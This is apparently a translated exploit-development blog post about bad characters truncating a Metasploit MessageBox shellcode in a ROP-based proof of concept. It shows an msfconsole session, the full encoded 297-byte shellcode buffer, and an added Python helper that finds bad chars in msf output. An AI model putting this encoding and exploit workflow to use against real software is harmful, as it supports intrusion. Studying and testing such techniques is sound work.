Shellcode study goes in two directions: one concentrates on the springboard side (jumps, ROP chains and the like), the other concentrates on the payload itself. To keep the current task clearly scoped, I put shellcode research aside for now and simply took the payload straight from msf.
I was looking at how the ROP chain is generated, and that part was fine, but when the shellcode ran there was a problem during execution. After a careful look at the layout I found that the PoC gets truncated by bad chars, which therefore need to be filtered out. The MessageBox pop-up generated by the msfpayload module with default settings simply could not be used, and the shellcode given in 0day2 also failed because of the bad character 0x0A.
So filtering was the only option.
root@bogon:~# msfconsole
msf > use payload/windows/messagebox
msf payload(messagebox) > generate -b '\x00\x0a\x0d' -t python
# windows/messagebox - 297 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# TITLE=MessageBox, TEXT=Hello, from MSF!, ICON=NO
buf = ""
buf += "\xb8\xdc\xa5\x17\xe0\xda\xcd\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x44\x31\x43\x14\x03\x43\x14\x83\xeb\xfc\x3e"
buf += "\x50\xce\x0b\x25\x42\x85\xef\xad\x44\xb4\x42\x3a\x96"
buf += "\xf1\xc7\x4f\xa9\x31\x83\x39\x46\xb9\xe5\xd9\xdd\xfb"
buf += "\x01\x6a\x9f\x23\x99\x5a\x58\x6b\x85\xd7\x6b\x2a\xb4"
buf += "\xc6\x73\x2c\xd6\x63\xe7\x8b\x33\xf8\xbd\xef\xb0\xaa"
buf += "\x15\x68\xc6\xb8\xed\xc2\xd0\xb7\xa8\xf2\xe1\x2c\xaf"
buf += "\xc7\xa8\x39\x04\xa3\x2a\xd3\x54\x4c\x1d\xeb\x6b\x1e"
buf += "\xda\x2b\xe7\x58\x22\x64\x05\x66\x63\x91\xe2\x53\x17"
buf += "\x41\x23\xd1\x06\x02\x69\x3d\xc8\xff\xe8\xb6\xc6\xb4"
buf += "\x7f\x92\xca\x4b\x6b\xa8\xf7\xc0\x6a\x47\x7e\x92\x48"
buf += "\x8b\xe0\xd9\x23\xbb\xcb\x09\xca\x59\x82\x73\xa5\x2f"
buf += "\xdb\x7d\xda\x62\x0c\x1e\xdd\x7c\x33\xa9\x67\x87\x77"
buf += "\xd7\xbf\x65\xf4\xa0\x5c\x4e\xa9\x46\xd2\x71\xb2\x69"
buf += "\x62\xc8\x45\xfd\x19\xbf\x75\xbc\x89\x0c\x44\x10\x2e"
buf += "\x1b\xdd\x1f\xcb\xa9\x95\x83\x37\x44\x2f\xdd\x6e\xa7"
buf += "\x7a\x25\x06\x95\xd5\x9e\xb0\xb8\x9b\x5c\x47\xa0\x07"
buf += "\xce\xa0\xb8\xb8\x11\xcf\x53\x28\x95\x68\x84\xde\x04"
buf += "\xee\xa1\x5c\xae\xbd\x4c\x12\x5d\x0f\x54\x5c\xfd\x4b"
buf += "\x60\xd4\x1e\xfb\x2c\xc6\xc0\xdc\xa4\x4b\x53\x5b\x14"
buf += "\x3c\x21\x0c\x3b\x9c\xad\xbd\xef\xfc\x4b\x2a\xb8\x99"
buf += "\xff\xc6\x09\xab\x77\x5a\x4e\x3b\x0e\x82\xbf\xe9\x42"
buf += "\x16\x91\x5f\x9d\x48\x20\xa0\x31\x96\x16\x28"
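As an added example (not from the original post), this Python script parses the `-t python` output format shown above and reports the offset of every byte that is on the `-b` exclusion list, so you can confirm the encoder actually removed the bad chars before blaming the layout. The sample buffer below is constructed for illustration and is not real msf output.

```python
import re

# Bytes the target cannot carry: the same list passed to `generate -b`.
BAD_CHARS = bytes.fromhex("000a0d")

# Constructed sample in the shape of `generate -t python` output (not real msf output).
# The last line deliberately contains 0x0a so the check has something to find.
SAMPLE_OUTPUT = r'''
# windows/messagebox - 9 bytes
buf = ""
buf += "\x31\xc0\x50\x68\x4d\x53\x46\x21"
buf += "\x0a"
'''

# One `buf += "\x.."` line: a run of \xHH escapes inside double quotes.
_LINE = re.compile(r'^buf \+= "((?:\\x[0-9a-fA-F]{2})+)"$')

def parse_msf_python(text: str) -> bytes:
    """Collect every buf += "\\x.." line into a single byte string."""
    out = bytearray()
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if m:
            out += bytes.fromhex(m.group(1).replace("\\x", ""))
    return bytes(out)

def find_bad_chars(data: bytes, bad: bytes = BAD_CHARS) -> list[tuple[int, int]]:
    """Return (offset, byte) for each byte of `data` that appears in `bad`."""
    return [(i, b) for i, b in enumerate(data) if b in bad]

def check(text: str, bad: bytes = BAD_CHARS) -> list[tuple[int, int]]:
    """Parse msf python output and list the bad chars it still contains."""
    return find_bad_chars(parse_msf_python(text), bad)

if __name__ == "__main__":
    hits = check(SAMPLE_OUTPUT)
    for off, b in hits:
        print(f"bad char 0x{b:02x} at offset {off}")
    print("clean" if not hits else f"{len(hits)} bad char(s) found")
```

A hit at an offset before the end of the buffer is exactly the truncation described above: whatever copies the payload stops at that byte and the rest never lands.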
Click the link to see the correct way to use generate: click me
Original article: http://blog.csdn.net/bugmeout/article/details/45271233